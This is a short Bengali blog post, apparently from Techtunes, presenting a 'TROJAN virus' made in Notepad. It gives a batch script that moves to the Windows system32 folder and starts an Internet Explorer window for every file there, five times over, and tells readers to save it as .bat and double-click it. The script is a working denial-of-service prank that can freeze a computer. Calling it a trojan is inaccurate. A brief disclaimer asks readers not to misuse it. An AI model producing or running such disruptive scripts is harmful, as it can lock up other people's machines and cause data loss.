TROJAN ভাইরাস তৈরী করুন নোটপাডে।

সবাই কে অনেক শুভেচ্ছা জানিয়ে শুরু করছি আমার আজকের টিউনস। আশা করি সবাই ভালোই আছেন আমিও আপনাদের দোয়াই ভালোই আছি। আজকে দেখাবো যে কী ভাবে সামান্য কিছু কোড ব্যবহার করে নোটপাডের সাহায্যে ভাইরাস তৈরী করা যায়। তাহলে আর কথা না বাড়িয়ে দেখে নেওয়া যাক যে কী ভাবে আমরা TROJAN ভাইরসি টি তৈরী করতে পারি।

প্রথমে আপনি আপনার কম্পিউটার হতে নোটপাড প্রোগ্রাম টি চালু করে নিন। এবার আমার দেয়া কোড গুলো নিয়ে এখানে পেষ্ট করুন।কোড গুলো আমি নিচে দিয়ে দিলাম -এখান থেকে কপি করুন অথবা আপনি চাইলে নোটপাডে লিখতেও পারেন।

শুধু আমার দেয়া কোডগুলো নোডপেড এ পেস্ট করুন।  নিচে কোডটি দেয়া আছে

cd c:\windows\system32
for %%a in (*) do start iexplore.exe
for %%a in (*) do start iexplore.exe
for %%a in (*) do start iexplore.exe
for %%a in (*) do start iexplore.exe
for %%a in (*) do start iexplore.exe

এবার এটাকে ANY NameBat দিয়ে Save করুন। তবে একটা জিনিস খেয়াল রাখতে হবে যে আপনি পাইল টা কে যে নামেই Save করেন না কেন শেষে যেন Bat থাকে, তা -না হলে কিন্তু কাজ হবে না। যদি সব কাজ ঠিক ঠাক মত করে থাকে তাহলে ঠিক আছে।   এখন এই ফাইলের উপর ডাবল ক্লিক করুন আর দেখু মজা।

{ একটা কথা আগে বলে রাখা ভালো যে এইটা কে কেউ খারাপ কাজে ব্যবহার করবেন না। আর এই টা দিয়ে তেমন কোন ক্ষতি হবে না }

দয়া করে কেউ কোন প্রকার খারাপ টিউমেন্ট করবেন না, আর যদি আপনাদে ভালো লাগে তাহলে একটা লাইক দিয়েন।

তাহলে আজ এই পর্যন্তই আবার পরর্বতিতে দেখা হবে নতুন কোন টিউনস নিয়ে। আর ততক্ষণ সবাই ভালো থাকবেন সুস্থ্য থাকবেন।

সময় হলে আমার ব্লগ সাইট থেকে একটু ঘুরে আসতে পারেন।

আমার ব্লগ সাইট

আমি ফেসবুকেও আছি

Level 1

আমি সাগর চন্দ্র শীল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 8 বছর 10 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 17 টি টিউন ও 10 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 1 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস